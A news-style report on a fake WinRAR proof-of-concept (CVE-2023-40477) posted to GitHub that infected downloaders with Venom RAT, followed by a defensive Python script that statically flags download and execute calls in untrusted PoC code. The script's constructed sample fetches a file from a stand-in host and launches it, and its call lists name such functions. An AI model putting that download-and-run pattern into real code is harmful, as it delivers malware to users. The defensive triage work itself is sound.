A recent cybersecurity report reveals that a malicious actor has released a fake proof-of-concept (PoC) exploit for a recently disclosed WinRAR vulnerability on GitHub. The aim of this malicious code is to infect users who download it with Venom RAT malware. The fake PoC is based on a publicly available script that exploits a SQL injection vulnerability, tracked as CVE-2023-25157, in an application called GeoServer.

While bogus PoCs are not uncommon for targeting the research community, it is suspected that the threat actors are targeting other criminals who may be adopting the latest vulnerabilities into their arsenal. The GitHub account that hosted the repository, whalersplonk, is no longer accessible, indicating that the account has been removed or suspended. The PoC was committed four days after the vulnerability was announced on August 21, 2023.

The WinRAR vulnerability in question is tracked as CVE-2023-40477 and can be exploited for remote code execution on Windows systems. The flaw was addressed by WinRAR maintainers in the 6.23 version, along with another flaw known as CVE-2023-38831, which was also actively exploited.

The repository analysis reveals a Python script and a Streamable video demonstrating how to use the exploit. The Python script fetches an executable named from a remote server, which is a variant of the Venom RAT malware. Venom RAT has the capability to list running processes and receive commands from an actor-controlled server.

It is noteworthy that the threat actor behind this fake PoC created a domain called checkblacklistwordseu at least 10 days before the public disclosure of the vulnerability. This indicates that they were prepared to take advantage of the criticality of the bug to attract potential victims.
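The report describes a PoC whose Python script fetches an executable from a remote server. As an added example (not code from the report or from the repository), the sketch below parses an unvetted PoC script without running it and flags when it both downloads content and launches a process. The call lists, function names and sample script are assumptions constructed for illustration.

```python
import ast

SINKS = {  # illustrative, non-exhaustive call names
    "fetch": {"requests.get", "requests.post", "urllib.request.urlopen", "urllib.request.urlretrieve"},
    "exec": {"subprocess.run", "subprocess.Popen", "subprocess.call", "os.system", "os.startfile"},
}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.insert(0, node.attr)
        node = node.value
    return ".".join([node.id] + parts) if isinstance(node, ast.Name) else None

def import_aliases(tree):
    """Map local names to real paths for 'import x as y' and 'from x import y'."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            aliases.update({a.asname: a.name for a in node.names if a.asname})
        elif isinstance(node, ast.ImportFrom) and node.module:
            aliases.update({a.asname or a.name: f"{node.module}.{a.name}" for a in node.names})
    return aliases

def triage(source):
    """Parse (never execute) a script; list fetch/exec calls as (line, name)."""
    tree = ast.parse(source)
    aliases = import_aliases(tree)
    findings = {label: [] for label in SINKS}
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or dotted_name(node.func) is None:
            continue
        head, _, rest = dotted_name(node.func).partition(".")
        full = aliases.get(head, head) + ("." + rest if rest else "")
        for label, names in SINKS.items():
            if full in names:
                findings[label].append((node.lineno, full))
    out = {label: sorted(hits) for label, hits in findings.items()}
    return {**out, "download_and_run": bool(out["fetch"] and out["exec"])}

# Constructed sample mimicking the described behaviour; it is only parsed, never run.
SAMPLE = '''
import subprocess
import requests as r
blob = r.get("http://payload.example.invalid/update.bin").content
subprocess.Popen(["update.bin"])
'''
print(triage(SAMPLE))
```

A hit is a prompt for manual review in an isolated VM, not a verdict: a script can hide these calls behind encoding or dynamic imports, so a clean result does not make a PoC safe to run.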